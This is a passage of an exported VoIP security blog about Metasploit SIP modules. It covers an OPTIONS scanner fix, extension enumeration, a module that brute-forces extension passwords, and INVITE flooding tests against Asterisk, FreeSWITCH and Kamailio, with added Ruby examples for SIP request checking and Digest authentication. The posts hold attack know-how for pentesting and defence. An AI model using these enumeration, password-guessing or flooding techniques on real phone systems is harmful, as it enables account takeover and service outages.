  suser = Rex::Text.rand_text_alphanumeric(rand(8)+1)
  shost = Rex::Socket.source_address(ip)
  src   = "#{shost}:#{datastore['CPORT']}"

  data  = "OPTIONS sip:#{datastore['TO']}@#{ip} SIP/2.0\r\n"
  data << "Via: SIP/2.0/UDP #{src};branch=z9hG4bK.#{"%.8x" % rand(0x100000000)};rport;alias\r\n"
  #data << "From: sip:#{suser}@#{src};tag=70c00e8c\r\n"
  data << "From: sip:#{suser}@#{src};tag=70c00e8c\r\n"
  #data << "To: sip:#{datastore['TO']}@#{ip}\r\n"
  data << "To: sip:#{suser}@#{ip}\r\n"
  data << "Call-ID: #{rand(0x100000000)}@#{shost}\r\n"
  data << "CSeq: 1 OPTIONS\r\n"
  data << "Contact: sip:#{suser}@#{src}\r\n"
  data << "Content-Length: 0\r\n"
  data << "Max-Forwards: 20\r\n"
  data << "User-Agent: #{suser}\r\n"
  data << "Accept: text/plain\r\n"
  # Note: the header section is never closed with the empty line (a bare CRLF)
  # that RFC 3261 section 7 requires even when there is no body.
  # The last expression (the String returned by <<) is the method's return value.
end</pre></div>
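<div style="text-align: justify;">
As an added example (my code, not the post's, Metasploit's or Kamailio's, and not a reimplementation of the Sanity module, whose exact checks the post does not list): a small Ruby checker that applies a hand-picked subset of RFC 3261 rules to an outgoing request, the kind of check a proxy or SBC runs before routing anything, together with a builder for an OPTIONS probe that satisfies them. The names <i>check_sip_request</i>, <i>build_options_probe</i> and <i>ORIGINAL_SHAPE_PROBE</i> are mine; the latter rebuilds the shape of the function above with constructed 192.0.2.x addresses and a fixed user so it can be checked offline.</div>

```ruby
require 'securerandom'

# Added example (my code, not the post's, Metasploit's or Kamailio's):
# a hand-picked subset of RFC 3261 rules applied to an outgoing request,
# plus a builder for an OPTIONS probe that satisfies them.

# Headers every request must carry (RFC 3261 section 8.1.1).
REQUIRED_HEADERS = %w[Via From To Call-ID CSeq Max-Forwards].freeze

# Split a raw message into [request_line, headers, body, terminated].
# Header names are lower-cased; `terminated` is false when the empty line
# that ends the header section is missing.
def parse_sip_request(raw)
  head, body = raw.split("\r\n\r\n", 2)
  lines = head.to_s.split("\r\n")
  request_line = lines.shift
  headers = Hash.new { |h, k| h[k] = [] }
  lines.each do |line|
    name, value = line.split(':', 2)
    next if value.nil?
    headers[name.strip.downcase] << value.strip
  end
  [request_line, headers, body.to_s, !body.nil?]
end

# Return the list of problems found; an empty list means the request passed.
def check_sip_request(raw)
  request_line, headers, body, terminated = parse_sip_request(raw)
  problems = []
  problems << 'header section not terminated by an empty line (section 7)' unless terminated

  req_method, uri, version = request_line.to_s.split(' ')
  unless version == 'SIP/2.0' && uri.to_s.start_with?('sip:', 'sips:')
    problems << "request line is not 'METHOD Request-URI SIP/2.0'"
  end

  REQUIRED_HEADERS.each do |h|
    problems << "missing #{h} header" if headers[h.downcase].empty?
  end

  # From MUST carry a tag header parameter (section 8.1.1.3). Without angle
  # brackets every ';param' after the URI is a header parameter, so the whole
  # value can be searched; with brackets, look after the '>'.
  from = headers['from'].first.to_s
  from_params = from.include?('>') ? from.split('>', 2).last : from
  problems << 'From header has no tag parameter' unless from_params =~ /;\s*tag=/

  # The CSeq method must match the request method (section 8.1.1.5).
  cseq_method = headers['cseq'].first.to_s.split(' ')[1]
  problems << 'CSeq method does not match request method' unless cseq_method == req_method

  # The Via branch must start with the magic cookie (section 8.1.1.7).
  problems << 'Via branch does not start with z9hG4bK' unless headers['via'].first.to_s =~ /;branch=z9hG4bK/

  # Content-Length, when present, must match the body actually sent (section 18.3).
  declared = headers['content-length'].first
  problems << 'Content-Length does not match body length' if declared && declared.to_i != body.bytesize
  problems
end

# Build an OPTIONS probe that passes the checks above. Addresses are the caller's.
def build_options_probe(target_ip, src_host, src_port, user = 'probe')
  src = "#{src_host}:#{src_port}"
  lines = [
    "OPTIONS sip:#{user}@#{target_ip} SIP/2.0",
    "Via: SIP/2.0/UDP #{src};branch=z9hG4bK#{SecureRandom.hex(8)};rport",
    'Max-Forwards: 70',
    "From: <sip:#{user}@#{src}>;tag=#{SecureRandom.hex(4)}",
    "To: <sip:#{user}@#{target_ip}>",
    "Call-ID: #{SecureRandom.hex(8)}@#{src_host}",
    'CSeq: 1 OPTIONS',
    "Contact: <sip:#{user}@#{src}>",
    'Accept: application/sdp',
    'Content-Length: 0'
  ]
  lines.join("\r\n") + "\r\n\r\n" # CRLF after the last header, then the empty line
end

# The probe from the post, rebuilt with constructed addresses (192.0.2.0/24)
# and a fixed user so it can be checked offline. There is no trailing empty line.
ORIGINAL_SHAPE_PROBE =
  "OPTIONS sip:100@192.0.2.10 SIP/2.0\r\n" \
  "Via: SIP/2.0/UDP 192.0.2.20:5060;branch=z9hG4bK.0a1b2c3d;rport;alias\r\n" \
  "From: sip:abc@192.0.2.20:5060;tag=70c00e8c\r\n" \
  "To: sip:abc@192.0.2.10\r\n" \
  "Call-ID: 12345@192.0.2.20\r\n" \
  "CSeq: 1 OPTIONS\r\n" \
  "Contact: sip:abc@192.0.2.20:5060\r\n" \
  "Content-Length: 0\r\n" \
  "Max-Forwards: 20\r\n" \
  "User-Agent: abc\r\n" \
  "Accept: text/plain\r\n"

if __FILE__ == $0
  p check_sip_request(ORIGINAL_SHAPE_PROBE)
  p check_sip_request(build_options_probe('192.0.2.10', '192.0.2.20', 5060))
end
```

<div style="text-align: justify;">
Run on the rebuilt probe, the checker reports exactly one problem: the header section is never closed with the empty line that section 7 of the RFC requires even when the body is absent, so a strict parser has no way to tell where the headers end. Whether that is the precise point at which a given server drops the message is something only its logs can confirm; the checker is there to show what a border element may legitimately reject, and what a scanner has to get right to be answered at all.</div>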
<div style="text-align: justify;">
<br /></div>
<br />
<div style="text-align: justify;">
Once some changes were made in order to use my function (with OPTIONS packets), we can see that we get a correct response:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVMcPFPKNVJ1PDp_jIXUoctVrTU2LFxEObuwku6EB39OLtABQzEBa6vhr2muJMOsiSSy6BwbgJ122QSuUWk4-gfksyL5_U5dHWmqll5y-0y1oJb05KMraZqdLI5ajzKsshbyJy18LQ_ok/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVMcPFPKNVJ1PDp_jIXUoctVrTU2LFxEObuwku6EB39OLtABQzEBa6vhr2muJMOsiSSy6BwbgJ122QSuUWk4-gfksyL5_U5dHWmqll5y-0y1oJb05KMraZqdLI5ajzKsshbyJy18LQ_ok/s400/3.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This issue often appears when working with Session Border Controllers, so I coded our own version of these modules. Nothing else; here are the links to the new versions of the modules. I also added this feature to the <a href="http://www.metasploit.com/modules/auxiliary/scanner/sip/enumerator">enumerator.rb</a> module, needed to brute-force valid extensions. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
- <a href="https://github.com/jesusprubio/metasploit-sip/blob/master/options.rb" target="_blank">options.rb</a><br />
- <a href="https://github.com/jesusprubio/metasploit-sip/blob/master/options_tcp.rb" target="_blank">options_tcp.rb</a><br />
- <a href="https://github.com/jesusprubio/metasploit-sip/blob/master/enumerator.rb" target="_blank">enumerator.rb</a></div>
<div style="text-align: justify;">
- <a href="https://github.com/jesusprubio/metasploit-sip/blob/master/enumerator_tcp.rb" target="_blank">enumerator_tcp.rb</a><br />
<br /></div>
<div style="text-align: justify;">
Anyway, if you try to enumerate Kamailio extensions you will fail, because its default configuration prevents this. Asterisk also has an option to prevent it, but it can be bypassed. And FreeSWITCH? We will play with all this stuff another day. ;)</div>
Anonymous http://www.blogger.com/profile/09565740223441207640 noreply@blogger.com tag:blogger.com,1999:blog-7743819158194184549.post-2030143441196597712 2012-09-27T14:38:00.000+02:00 2012-10-18T11:23:45.308+02:00
VoIP class at Vigo University<br />
<div dir="ltr" id="internal-source-marker_0.19917911513917763" style="margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 36pt;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline;">My colleague Antón (</span><a href="https://twitter.com/AntonRoman" target="_blank"><span style="color: #1155cc; font-family: Arial; font-size: 15px; vertical-align: baseline;">@AntonRoman</span></a><span style="font-family: Arial; font-size: 15px; vertical-align: baseline;">) and I visited the <a href="http://www.teleco.uvigo.es/" target="_blank"><span style="color: #0b5394;">Telecommunication Engineering School</span></a> at </span><a href="http://www.uvigo.es/" target="_blank"><span style="color: #1155cc; font-family: Arial; font-size: 15px; vertical-align: baseline;">Vigo University</span></a><span style="font-family: Arial; font-size: 15px; vertical-align: baseline;"> last Monday to give a talk about VoIP and the technologies and projects we’re involved in at </span><a href="http://quobis.com/" target="_blank"><span style="color: #1155cc; font-family: Arial; font-size: 15px; vertical-align: baseline;">Quobis</span></a><span style="font-family: Arial; font-size: 15px; vertical-align: baseline;">. As in the year before, we were invited by the professor of the subject “<i>Switching laboratory</i>”, </span><a href="http://gssi.det.uvigo.es/users/mlnores/personal/personal.html" target="_blank"><span style="color: #1155cc; font-family: Arial; font-size: 15px; vertical-align: baseline;">Martín López Nores</span></a><span style="font-family: Arial; font-size: 15px; vertical-align: baseline;">, to prepare a Kamailio practical exercise.</span><br />
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline;"></span></div>
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline;"></span><br />
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 36pt;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline;">Antón started by explaining some basic VoIP concepts and then went through more advanced ones, mainly focused on the Kamailio SIP server (</span><a href="http://www.slideshare.net/Quobis/presentacion-kamailio-uvigo09262011" target="_blank"><span style="color: #1155cc; font-family: Arial; font-size: 15px; vertical-align: baseline;">slides</span></a><span style="font-family: Arial; font-size: 15px; vertical-align: baseline;">). Then I gave a review and a demo of the most common VoIP attack vectors that we find every day “in the wild” and their available countermeasures (</span><a href="http://www.slideshare.net/Quobis/info-secvoip" target="_blank"><span style="color: #1155cc; font-family: Arial; font-size: 15px; vertical-align: baseline;">slides</span></a><span style="font-family: Arial; font-size: 15px; vertical-align: baseline;">). </span></div>
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline;"></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiEKgYGUCFHzGoW9dhxhnDSv1CJB6DJfNpB-vmTd73KHxeAOZqaWDHRRytv7-6LKIZXCTunnxRz9427NaRrrcgpNTiDHRheWj_mwK1MJMSaPy2sXk14cXaHxZSEyhWzTjyFz9bO-3FXWk/s1600/A3qORGFCYAEyqAt.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiEKgYGUCFHzGoW9dhxhnDSv1CJB6DJfNpB-vmTd73KHxeAOZqaWDHRRytv7-6LKIZXCTunnxRz9427NaRrrcgpNTiDHRheWj_mwK1MJMSaPy2sXk14cXaHxZSEyhWzTjyFz9bO-3FXWk/s320/A3qORGFCYAEyqAt.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4jlBDjcSegb2hdjcdlgpAjTwmtTh6xA__IJckiFTnzh9-iMrVL3zZphssLBw0_2XLqSHSiCdU5NEoAmphrxL5PMO9ZMGnJhRtvYRLL4PEiUjVMGAbVrSJ9JFwLENu9bVew7GLvQjQlM4/s1600/A3q-2l8CUAEo-wh.jpg-large" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4jlBDjcSegb2hdjcdlgpAjTwmtTh6xA__IJckiFTnzh9-iMrVL3zZphssLBw0_2XLqSHSiCdU5NEoAmphrxL5PMO9ZMGnJhRtvYRLL4PEiUjVMGAbVrSJ9JFwLENu9bVew7GLvQjQlM4/s320/A3q-2l8CUAEo-wh.jpg-large" width="320" /></a></div>
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<br /></div>
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline;">As in the last course, we extended the mandatory practice with an optional exercise (you can download them from the links below):</span></div>
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline;">- </span><a href="http://www.slideshare.net/Quobis/practica-lc-20112012-14472191" target="_blank"><span style="color: #1155cc; font-family: Arial; font-size: 15px; vertical-align: baseline;">2011-2012</span></a><span style="font-family: Arial; font-size: 15px; vertical-align: baseline;"></span></div>
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline;">- </span><a href="http://www.slideshare.net/Quobis/kamailio-practice-quobisuniversity-of-vigo-laboratory-of-commutation-20122013" target="_blank"><span style="color: #1155cc; font-family: Arial; font-size: 15px; vertical-align: baseline;">2012-2013</span></a><span style="font-family: Arial; font-size: 15px; vertical-align: baseline;"></span></div>
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline;"></span><br />
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 36pt;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline;">We encourage the students to give it a try; I strongly believe this practice could be very useful for their professional future. In fact, Andrés Souto (</span><a href="https://twitter.com/kai670" target="_blank"><span style="color: #1155cc; font-family: Arial; font-size: 15px; vertical-align: baseline;">@kai670</span></a><span style="font-family: Arial; font-size: 15px; vertical-align: baseline;">), who did a great job last year as a student of the previous course, is now working with us at Quobis. And last, but not least, we would like to thank Martín for this opportunity to share a good time and discover skilled students.</span></div>
Anonymous http://www.blogger.com/profile/09565740223441207640 noreply@blogger.com tag:blogger.com,1999:blog-7743819158194184549.post-7215408297226664131 2012-07-29T21:19:00.003+02:00 2012-11-09T14:01:01.980+01:00
Bruteforcing SIP extensions with Metasploit
Hi, some time ago I published <a href="http://nicerosniunos.blogspot.com.es/2011/09/voip-information-gathering-metasploit.html" target="_blank">this post</a> about VoIP information gathering with Metasploit. For a minimal pentesting process, a module capable of brute-forcing the passwords of the discovered extensions is needed, so I developed one. If you know the <a href="http://blog.sipvicious.org/" target="_blank">SIPvicious</a> suite, this module provides the features of its <i>sipcrack</i> tool.<br />
<br />
Based on the available SIP related modules, I implemented the <a href="http://www.site.uottawa.ca/~bob/gradstudents/DigestAuthenticationReport.pdf" target="_blank">SIP Digest Authentication algorithm</a>, and the <i>Msf::Auxiliary::AuthBrute</i> mixin does the magic with the possible user/password combinations. This picture shows an example of use in which the password of extension 100 is discovered (<i>100</i>).<br />
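As an added example (my Ruby code, not the module's): the Digest computation the module implements (RFC 2617, used by SIP per RFC 3261 section 22.4), written the way a registrar checks it. <i>parse_digest_params</i>, <i>digest_response</i>, <i>build_authorization</i>, <i>digest_valid?</i> and <i>secure_equal?</i> are my names; the challenge in <i>SAMPLE_CHALLENGE</i>, the extension/password pair and the address are constructed sample values. The same arithmetic, run once per candidate password against a single Authorization header, is what turns one captured or provoked challenge into an offline guessing problem, which is why an extension's password must never be the extension number itself, as it is in the screenshot above.<br />

```ruby
require 'digest/md5'

# Added example, not the module's code: the Digest response computation of
# RFC 2617 (SIP reuses it, RFC 3261 section 22.4) and the check a registrar
# performs on an Authorization header. Names and sample values are mine.

# Parse 'Digest k1="v1", k2=v2, ...' (a WWW-Authenticate challenge or an
# Authorization answer) into a Hash with lower-cased keys.
def parse_digest_params(header_value)
  params = {}
  header_value.sub(/\ADigest\s+/i, '').scan(/(\w+)=(?:"([^"]*)"|([^,\s]+))/) do |key, quoted, bare|
    params[key.downcase] = quoted || bare
  end
  params
end

# HA1 = MD5(user:realm:password), HA2 = MD5(method:uri)
# response = MD5(HA1:nonce:HA2)                  when the challenge has no qop
# response = MD5(HA1:nonce:nc:cnonce:qop:HA2)    when qop=auth is used
def digest_response(user:, realm:, password:, method:, uri:, nonce:, qop: nil, nc: nil, cnonce: nil)
  ha1 = Digest::MD5.hexdigest("#{user}:#{realm}:#{password}")
  ha2 = Digest::MD5.hexdigest("#{method}:#{uri}")
  if qop
    Digest::MD5.hexdigest("#{ha1}:#{nonce}:#{nc}:#{cnonce}:#{qop}:#{ha2}")
  else
    Digest::MD5.hexdigest("#{ha1}:#{nonce}:#{ha2}")
  end
end

# Constant-time comparison so the verifier does not leak how many leading
# characters of the response matched.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Client side: the Authorization value sent in reply to a 401 challenge
# (`challenge` is the parsed WWW-Authenticate). cnonce is fixed here for
# reproducibility; a real client picks a fresh random one.
def build_authorization(challenge, user:, password:, method:, uri:, nc: '00000001', cnonce: nil)
  qop = challenge['qop'] ? 'auth' : nil
  cnonce ||= 'deadbeef' if qop
  resp = digest_response(user: user, realm: challenge['realm'], password: password, method: method,
                         uri: uri, nonce: challenge['nonce'], qop: qop, nc: nc, cnonce: cnonce)
  fields = ["username=\"#{user}\"", "realm=\"#{challenge['realm']}\"", "nonce=\"#{challenge['nonce']}\"",
            "uri=\"#{uri}\"", "response=\"#{resp}\"", 'algorithm=MD5']
  fields += ["qop=#{qop}", "nc=#{nc}", "cnonce=\"#{cnonce}\""] if qop
  'Digest ' + fields.join(', ')
end

# Registrar side: does the Authorization header match the stored password
# for the request method it was sent with?
def digest_valid?(authorization, method, password)
  p = parse_digest_params(authorization)
  expected = digest_response(user: p['username'], realm: p['realm'], password: password,
                             method: method, uri: p['uri'], nonce: p['nonce'],
                             qop: p['qop'], nc: p['nc'], cnonce: p['cnonce'])
  secure_equal?(expected, p['response'].to_s)
end

# Constructed sample challenge, in the style of the one a PBX returns to a
# REGISTER without credentials (no qop, MD5 only).
SAMPLE_CHALLENGE = 'Digest algorithm=MD5, realm="asterisk", nonce="4d3a9b1c"'

if __FILE__ == $0
  challenge = parse_digest_params(SAMPLE_CHALLENGE)
  auth = build_authorization(challenge, user: '100', password: '100', method: 'REGISTER', uri: 'sip:192.0.2.10')
  puts auth
  puts digest_valid?(auth, 'REGISTER', '100')    # true
  puts digest_valid?(auth, 'REGISTER', 'wrong')  # false
end
```

The registrar check binds the response to the method and URI as well as the nonce, so an Authorization header captured for a REGISTER does not validate for an INVITE; what it cannot do is stop anyone holding the header from trying passwords offline, since the nonce is right there in clear text. Rate limiting on 401 responses, per-extension secrets that are long and random, and TLS on the signalling leg are the controls that actually matter against the module described in this post.<br />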
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPJyNI7fgHZUqCrj6gGG1blyUT9P1ykcft-9mzZNBhFtkUe76vVXugBt4xLZHRTVMfgTAGT7UP7WX9Mvn1YZOyQFQbxmCNJBDercVHDSDSbOmKthof2GoRQNlopGhDwo5AIDNobnqSgRo/s1600/Captura+de+pantalla+de+2012-07-27+23:49:29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPJyNI7fgHZUqCrj6gGG1blyUT9P1ykcft-9mzZNBhFtkUe76vVXugBt4xLZHRTVMfgTAGT7UP7WX9Mvn1YZOyQFQbxmCNJBDercVHDSDSbOmKthof2GoRQNlopGhDwo5AIDNobnqSgRo/s400/Captura+de+pantalla+de+2012-07-27+23:49:29.png" width="400" /></a></div>
<br />
Source code:<br />
<ul>
<li><a href="https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb" target="_blank">UDP version</a></li>
<li><a href="https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack_tcp.rb" target="_blank">TCP version </a></li>
</ul>
<br />
If you use the module outside a LAN, it is strongly recommended to set your external IP address (option "EXTIP") to avoid SIP and NAT problems.<br />
<br />
Bye ;)
Anonymous http://www.blogger.com/profile/09565740223441207640 noreply@blogger.com tag:blogger.com,1999:blog-7743819158194184549.post-4544334690728501787 2012-05-01T20:05:00.000+02:00 2012-08-28T12:23:54.854+02:00
Flooding Asterisk, Freeswitch and Kamailio with Metasploit
<span style="font-family: 'Trebuchet MS', sans-serif;">Hi, it has been a long time since my last post because of my new job and my final year project ("VoIP denial of service attacks", for the curious), but there is something I found during my tests with <a href="http://www.freeswitch.org/" target="_blank">Freeswitch</a>, <a href="http://www.kamailio.org/w/" target="_blank">Kamailio</a> and <a href="http://www.asterisk.org/" target="_blank">Asterisk</a> that I want to share.</span><br />
<span style="font-family: 'Trebuchet MS', sans-serif; font-size: xx-small;">NOTE: Actually, the guys of the <a href="http://www.securitybydefault.com/" target="_blank">Security By Default</a> blog published <a href="http://www.securitybydefault.com/2012/03/desarrollando-para-metasploit-ii.html" target="_blank">two articles</a> by us (my good friend <a href="https://twitter.com/#%21/rmallof" target="_blank">Roi Mallo</a> and me) about how to develop modules for the Metasploit framework; another two are coming. ;)</span><br />
<span style="font-family: 'Trebuchet MS', sans-serif; font-size: xx-small;"><br /></span>
<span style="font-family: 'Trebuchet MS', sans-serif;">During my project, among other things, I developed a Metasploit module which can flood the SIP protocol with common requests (INVITE, OPTIONS, REGISTER, BYE). I wrote it at Quobis (nice job ;) for some private tests, because the existing software didn't fit our needs, so we are going to test how different GPL VoIP servers behave against this kind of attack:</span><br />
<span style="font-family: 'Trebuchet MS', sans-serif;">- Asterisk: I think it needs no introduction, the famous softswitch/PBX software.</span><br />
<span style="font-family: 'Trebuchet MS', sans-serif;">- Freeswitch: It's a newer softswitch that seems to be the Asterisk replacement, and one I really like.</span><br />
<span style="font-family: 'Trebuchet MS', sans-serif; text-align: left;">- Kamailio (formerly OpenSER): It is the best-known GPL </span><a href="http://www.voip-info.org/wiki/view/SIP+proxy" style="font-family: 'Trebuchet MS', sans-serif; text-align: left;" target="_blank">SIP proxy</a><span style="font-family: 'Trebuchet MS', sans-serif; text-align: left;">.</span><br />
<div style="text-align: center;">
<span style="font-family: 'Trebuchet MS', sans-serif; margin-left: 1em; margin-right: 1em; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic6k8NpPzXDsro_vYxKWzXcCuREM4-SogJsEACpUjE2OIExE_y-6AXzxoueZHGQVsow2_npEnQaHCKvkxqdR5kDugmHgWP7Esjr9m1ZtChwpb5C29WeFSJtWlD7wVaUAPp1M38_ySdrGE/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic6k8NpPzXDsro_vYxKWzXcCuREM4-SogJsEACpUjE2OIExE_y-6AXzxoueZHGQVsow2_npEnQaHCKvkxqdR5kDugmHgWP7Esjr9m1ZtChwpb5C29WeFSJtWlD7wVaUAPp1M38_ySdrGE/s400/1.png" width="265" /></a></span></div>
<div style="text-align: center;">
<span style="font-family: 'Trebuchet MS', sans-serif; font-size: x-small;">Virtual machines</span></div>
<span style="font-family: 'Trebuchet MS', sans-serif;">First of all I want to be clear about two things:</span><br />
<span style="font-family: 'Trebuchet MS', sans-serif;">- Tests were made without any protection on the server side; in a real environment we should find (in theory xD) something like iptables, Snort, Fail2ban, <a href="http://www.kamailio.org/docs/modules/1.4.x/pike.html" target="_blank">Pike</a> or a proprietary <a href="http://en.wikipedia.org/wiki/Session_border_controller" target="_blank">Session Border Controller</a> in large architectures. Anyway, it should be enough for this proof of concept.</span><br />
<span style="font-family: 'Trebuchet MS', sans-serif;">- Asterisk and Freeswitch are <a href="http://en.wikipedia.org/wiki/Private_branch_exchange#Private_branch_exchange" target="_blank">PBX</a> software; they were not designed to run at the boundary between the infrastructure and the Internet, although they are usually placed there. In fact, one of the reasons for this post is to show the importance of using a SIP proxy, for both security and performance reasons.</span><br />
<span style="font-family: 'Trebuchet MS', sans-serif;"><br /></span>
<span style="font-family: 'Trebuchet MS', sans-serif;">The next pictures show an example of the Metasploit module's use and the generated traffic; we will use the same attack against different IPs, so I'm showing it only once:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-family: 'Trebuchet MS', sans-serif; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUwH5Mk_D0i409X7GjD4GVaQiOczwv9HMDFkLTScE_weihm5VEplog_xHZyD9W-dp5H_0whTqyAYefaXOsj8TIGYLwaanom27KrHDSEcz_yQIUuhc8xrHIV3o0zklUlYTC0TuVzP5ZD7w/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="357" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUwH5Mk_D0i409X7GjD4GVaQiOczwv9HMDFkLTScE_weihm5VEplog_xHZyD9W-dp5H_0whTqyAYefaXOsj8TIGYLwaanom27KrHDSEcz_yQIUuhc8xrHIV3o0zklUlYTC0TuVzP5ZD7w/s400/2.png" width="400" /></a></span></div>
<div style="text-align: center;">
<span style="font-family: 'Trebuchet MS', sans-serif; font-size: x-small;">Module use and config</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-family: 'Trebuchet MS', sans-serif; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha6M86ddi4mDnHs9PI-rKG150D1d4sH6l0Y8aHChN_uq2exxdT2h-ly7GQqpxHu2KVgraIF4UVCcaXn2Wom3o7cJX0h7UxEnP6JsRhYXMZAhK7nwcoqaprcf8Raf6rTfs6_a7tFMqXy4U/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha6M86ddi4mDnHs9PI-rKG150D1d4sH6l0Y8aHChN_uq2exxdT2h-ly7GQqpxHu2KVgraIF4UVCcaXn2Wom3o7cJX0h7UxEnP6JsRhYXMZAhK7nwcoqaprcf8Raf6rTfs6_a7tFMqXy4U/s400/3.png" width="400" /></a></span></div>
</div>
<div style="text-align: center;">
<span style="font-family: 'Trebuchet MS', sans-serif; font-size: x-small;">Captured traffic</span></div>
<span style="font-family: 'Trebuchet MS', sans-serif;">I chose INVITE packets because they are much more effective against all kinds of SIP devices, and set TIMEOUT to 0 to generate more traffic. Then, the results:</span><br />
<span style="font-family: 'Trebuchet MS', sans-serif; font-size: xx-small;">NOTE: With the Wireshark filter "sip.Method==REGISTER or sip.Status-Code==200 and !sdp" we can see whether a softphone (<a href="http://jitsi.org/" target="_blank">Jitsi</a> in this case) could register; this way we can confirm whether the tested software loses some REGISTER packets under attack.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-family: 'Trebuchet MS', sans-serif; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOM8GUUmkDjcmnQWO55anHZZ5va32wlzg7bK6ze9rwlUUh12Tb9bz3ev49GDT-OlNFVBla-FtHhPgaOI-6kUKK3GqfANy372rKHZiKO3kzd4BLqD8nEHQljByKhSYgzS_PFm9dodirvQs/s1600/Captura+de+pantalla+de+2012-05-01+13:41:29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOM8GUUmkDjcmnQWO55anHZZ5va32wlzg7bK6ze9rwlUUh12Tb9bz3ev49GDT-OlNFVBla-FtHhPgaOI-6kUKK3GqfANy372rKHZiKO3kzd4BLqD8nEHQljByKhSYgzS_PFm9dodirvQs/s400/Captura+de+pantalla+de+2012-05-01+13:41:29.png" width="400" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-family: 'Trebuchet MS', sans-serif; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSO4KQNID8NWCRd_-xujZ8oqrqjL6afTbkSzWs1-I0pGYOvpZMsttI09jDG3QOLI3UdKnXsi1hi25TKITAoG5zBamndf_jXBrmi7pDgDhhnmGmUb44wKGInEXysyAPvRhmAbFIPsQDnqk/s1600/Captura+de+pantalla+de+2012-05-01+13:47:10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSO4KQNID8NWCRd_-xujZ8oqrqjL6afTbkSzWs1-I0pGYOvpZMsttI09jDG3QOLI3UdKnXsi1hi25TKITAoG5zBamndf_jXBrmi7pDgDhhnmGmUb44wKGInEXysyAPvRhmAbFIPsQDnqk/s400/Captura+de+pantalla+de+2012-05-01+13:47:10.png" width="400" /></a></span></div>
<div style="text-align: center;">
<span style="font-family: 'Trebuchet MS', sans-serif; font-size: x-small;">Metasploit vs. Asterisk</span></div>
<div style="text-align: center;">
<div class="separator" style="clear: both; text-align: center;">
